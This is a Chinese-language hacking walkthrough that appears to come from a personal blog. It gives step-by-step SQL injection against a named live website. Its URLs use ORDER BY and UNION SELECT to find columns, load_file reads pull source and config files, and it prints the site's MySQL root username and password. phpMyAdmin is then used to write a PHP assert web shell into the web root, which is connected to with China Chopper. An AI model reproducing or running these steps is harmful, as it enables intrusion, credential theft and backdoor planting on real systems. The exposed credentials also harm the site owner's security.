作者 : lahack
qq : 527480074
博客 : https://www.lshack.cn/

教学视频地址 https://buluo.qq.com/p/detail.html?bid=22097&pid=5136790-1492518179&from=grp_sub_obj
目标网站: www.lrjj.cn

流程如下

1
2
3
4
5
6
7
http://www.lrjj.cn/content.php?id=2 and 1=2 #回显错误
http://www.lrjj.cn/content.php?id=2 order by 20 #页面出错
http://www.lrjj.cn/content.php?id=2 order by 1 #折半显示正确
http://www.lrjj.cn/content.php?id=2 order by 10 #显示错误
http://www.lrjj.cn/content.php?id=2 order by 7 #显示正确最大值
http://www.lrjj.cn/content.php?id=2 UNION SELECT 1,2,3,4,5,6,7--
http://www.lrjj.cn/content.php?id=2 UNION SELECT 1,2,3,user(),5,6,7-- #4的位置显示 root@localhost

1
谷歌浏览器中 site:lrjj.cn warning 可查询到网站路径 D:\AppServ\www
1
2
3
将'D:\AppServ\www\content.php' 用工具转成十六进制
http://www.lrjj.cn/content.php?id=2 UNION SELECT 1,2,3,load_file(hex),5,6,7-- #括号内hex为content.php全路径转化的十六进制值
页面有红色网页代码爆出,但是显示很混乱,查看网页源代码,显示出一个关键网页./includes/commons.php
1
2
3
继续将'D:\AppServ\www\includes\commons.php'用工具转成十六进制
再次http://www.lrjj.cn/content.php?id=2 UNION SELECT 1,2,3,load_file(hex),5,6,7-- #括号内hex为commons.php全路径转化的十六进制值
页面再次有红色网页代码爆出,查看网页源代码,发现关键网页./includes/config.php
1
2
3
第三次将D:\AppServ\www\includes\config.php' 用工具转成十六进制
http://www.lrjj.cn/content.php?id=2 UNION SELECT 1,2,3,load_file(hex),5,6,7--
查看网页源代码爆出config.php中包含用户名'root' 密码'19760422@dw'
1
2
3
http://www.lrjj.cn/phpmyadmin #用获取的mysql用户名密码登录
选sql语句模块
select 'fuck you <?php assert($_REQUEST["1"]);?>' into outfile 'D:\\AppServ\\www\\fuck.php';
1
菜刀连接 http://www.lrjj.cn/fuck.php #成功连上